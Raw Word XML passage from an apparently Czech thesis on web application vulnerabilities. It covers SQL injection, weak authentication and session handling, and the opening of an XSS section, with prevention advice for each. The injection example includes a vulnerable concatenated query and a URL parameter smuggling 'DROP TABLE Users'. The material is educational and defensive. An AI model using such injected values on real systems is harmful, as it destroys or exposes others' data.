      </w:r>
      <w:r w:rsidR="009023C7">
        <w:t xml:space="preserve">U každé z nich </w:t>
      </w:r>
      <w:r>
        <w:t>je uveden</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t>v čem</w:t>
      </w:r>
      <w:r w:rsidR="009023C7">
        <w:t xml:space="preserve"> zranitelnost spočívá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t xml:space="preserve">je nastíněna </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ukázka jejího zneužití a seznam doporučení, kterými </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t xml:space="preserve">se lze </w:t>
      </w:r>
      <w:r>
        <w:t>řídit, aby se zranitelnosti v aplikaci předešlo.</w:t>
      </w:r>
      <w:r w:rsidR="00007F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc372462426"/>
      <w:bookmarkStart w:id="68" w:name="_Toc387327811"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je technika napadení webových stránek vsunutím (anglicky "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064783D">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">") nebezpečného kódu přes neošetřený vstup, čímž dojde k vykonání tohoto kódu. Této techniky lze využít v případě, kdy se hodnota vstupu používá při dynamicky vytvářených příkazech interpretovaného jazyka. Typicky je spojována se SQL databázemi, nicméně stejným způsobem lze pozměnit i </w:t>
      </w:r>
      <w:r w:rsidRPr="0064783D">
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064783D">
        <w:t>Xpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nebo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064783D">
        <w:t>NoSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dotazy, </w:t>
      </w:r>
      <w:r w:rsidRPr="0064783D">
        <w:t>SMTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hlavičky apod.</w:t>
      </w:r>
      <w:r w:rsidR="00CF12F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344870"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION zi7QEcKlXoi1VMuN \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[11]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc387327812"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00AD478C">
      <w:r>
        <w:t xml:space="preserve">Útočník využije neošetřeného vstupního formuláře nebo </w:t>
      </w:r>
      <w:r w:rsidRPr="00534A7C">
        <w:t>URL  parametru,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80AEE">
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r>
        <w:t>terý se přímo použije při vytváření následujícího SQL dotazu:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="00A4036F" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve"> = "SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve"> = " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>Request.QueryString.Get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>("id");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00AD478C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Při skládání dotazu se předpokládá, že hodnota vstupu "id" je číslo, ale není to ověřováno. Pokud útočník podvrhne vstup "id", může docílit například smazání celé tabulky "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">http://example.com/userview?id=1; DROP TABLE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00AD478C">
      <w:r>
        <w:t>Výsledný dotaz bude vypadat následovně:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1; DROP TABLE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00AD478C">
      <w:r>
        <w:t xml:space="preserve">Kromě nastíněného destruktivního útoku lze samozřejmě zranitelnost využít </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t>také</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">neoprávněnému získání dat, pozměnění uložených dat a podobně. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc387327813"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Je nutné předpokládat, že veškerá vstupní data mohou obsahovat škodlivý kód a</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">podle toho s nimi nakládat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dobrou praktikou je úplně se vyhnout dynamicky vytvářenému interpretovanému kódu nebo dotazům. Pokud je nutné interpretovaný kód použít, tak místo přímo skládaného kódu je vhodné použít API, které nabízí parametrizované rozhraní (například para</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t>metrické SQL dotazy nebo využít</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uložených procedur). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF12F7" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jestliže není parametrizované rozhraní dostupné, tak je vždy nutné validovat </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t xml:space="preserve">správný </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">typ vstupních hodnot a v případě řetězců </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731F4C">
        <w:t>escapovat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> speciální znaky daného jazyka (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731F4C">
        <w:t>black</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731F4C">
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - v případě SQL například apostrof, který ukončuje řetězec). Další možností je opačný přístup </w:t>
      </w:r>
      <w:r w:rsidRPr="00731F4C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731F4C">
        <w:t>white</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731F4C">
        <w:t xml:space="preserve"> list),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kdy jsou povolené jen určité nezávadné znaky a všechny ostatní uživatel nesmí použít.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF12F7" w:rsidRPr="00015ADC" w:rsidRDefault="004D2639" w:rsidP="00CF12F7">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344878"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 7 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 7]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Ref372450248"/>
      <w:bookmarkStart w:id="72" w:name="_Toc372462427"/>
      <w:bookmarkStart w:id="73" w:name="_Toc387327814"/>
      <w:r>
        <w:t>Zranitelná autentizace nebo správa relace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Využití zranitelnosti v procesu autentizace nebo správě relace (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064783D">
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) typicky vede k</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">podvrhnutí identity uživatele. Protokol </w:t>
      </w:r>
      <w:r w:rsidRPr="0064783D">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bezstavový</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (každý požadavek je prováděn samostatně bez návaznosti na předešlé požadavky uživatele), proto musí webové servery implementovat mechanismus, který zajišťuje uchování uživatelského kontextu mezi jednotlivými požadavky. Každá </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t>taková</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> relace je jednoznačně identifikována a</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>uživatelův prohlížeč musí s každým požadavkem zasílat také identifikátor relace, ke</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">které požadavek patří. Pokud útočník získá tento identifikátor, může ve webové aplikaci vystupovat a jednat pod identitou uživatele, kterému byl identifikátor odcizen. Další </w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:lastRenderedPageBreak/>
        <w:t>možností</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jak podvrhnout identitu uživatele</w:t>
      </w:r>
      <w:r w:rsidR="0064783D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je odcizení přímo jeho přihlašovacích údajů.</w:t>
      </w:r>
      <w:r w:rsidR="007F0535">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344879"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION 8HoKXwhUe2cSlVMc \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[12]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc387327815"/>
      <w:r>
        <w:t>Ukázky útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webová aplikace pro uchovávání identifikátoru nepoužívá </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, ale předává si jej jako URL parametr. Uživatel při používání aplikace pošle odkaz na zajímavý obsah  serveru svým přátelům, přičemž netuší, že součástí odkazu je i identifikátor jeho relace. Pokud přes tento odkaz někdo k serveru přistoupí, tak bude vystupovat jako přihlášený uživatel a dostane se k jeho citlivým údajům.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aplikace nemá nastavenou omezenou platnost relace. Uživatel se přihlásí na veřejně dostupném PC (například v internetové kavárně), ale zapomene se odhlásit a místo toho jen zavře prohlížeč. Útočník později použije stejný prohlížeč, ve kterém </w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t>přistoupí na</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> adresu aplikace a jedná jako přihlášený uživatel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Útočník získá přístup k databázi aplikace (může se jednat i o nepoctivého administrátora), přičemž přihlašovací údaje uživatelů jsou uloženy v otevřené podobě.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc387327816"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Neukládat přihlašovací údaje uživatelů v otevřené podobě.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Neumožnit jednoduše změnit přihlašovací údaje, pro případ, že by útočník získal přístup k aktivní relaci uživatele. V praxi to znamená vyžadovat opětovné zadání přihlašovacích údajů před tím, než je uživateli umožněno provádět následující akce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>změn</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hesla,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="00B74E14" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>změnu</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> emailové adresy v případě, že </w:t>
      </w:r>
      <w:r>
        <w:t>přes</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lze </w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t>obnovit zapomenuté heslo,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>zobrazení nebo změn</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kontrolních otázek a odpovědí pro případ ztráty hesla</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nevystavovat identifikátor relace v URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vygenerovat nový identifikátor relace při každém přihlášení uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Omezit platnost každé relace (relace se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>invaliduje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> po určité době nečinnosti uživatele a také po odhlášení uživatele).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Přihlašovací údaje uživatele a identifikátor relace zasílat přes šifrovaný kanál.</w:t>
      </w:r>
      <w:r w:rsidR="00CF12F7" w:rsidRPr="00CF12F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF12F7">
        <w:t>Jinak je aplikace náchylná na "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF12F7">
        <w:t>men</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF12F7">
        <w:t>-in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF12F7">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF12F7">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF12F7">
        <w:t>middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF12F7">
        <w:t xml:space="preserve">" útok </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344863"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION rPxQXOGKHiBgcdvr \* MERGEFORMAT ">
            <w:r w:rsidR="00956893" w:rsidRPr="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[13]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CF12F7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344889"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 8 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 8]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc372462428"/>
      <w:bookmarkStart w:id="77" w:name="_Ref382677795"/>
      <w:bookmarkStart w:id="78" w:name="_Toc387327817"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cross</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Útok </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je typem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B74E14">
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> útoku, ve které se škodlivý skript vloží do jinak neškodných a důvěryhodných webových stránek. Útočník tedy použije webovou aplikaci k doručení škodlivého kódu, obvykle ve formě skriptu interpretovaného prohlížečem, nic netušícímu koncovému uživateli. Tato zranitelnost je velmi rozšířená a</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>může se vyskytovat všude tam, kde webová aplikace používá vstup od uživatele k</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>vygenerování výstupního kódu stránky. Prohlížeč zasaženého uživatele nemůže tento škodlivý skript rozpoznat od jiných skriptů na stránce a dojde k jeho spuštění. Vzhledem k</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t> </w:t>
      </w:r>
      <w:r>
